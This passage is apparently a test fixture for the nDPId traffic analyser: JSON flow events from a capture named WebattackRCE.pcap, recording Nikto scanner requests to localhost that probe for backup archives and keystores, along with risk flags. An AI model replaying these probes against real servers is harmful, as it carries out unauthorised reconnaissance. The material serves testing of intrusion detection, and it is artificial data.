-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 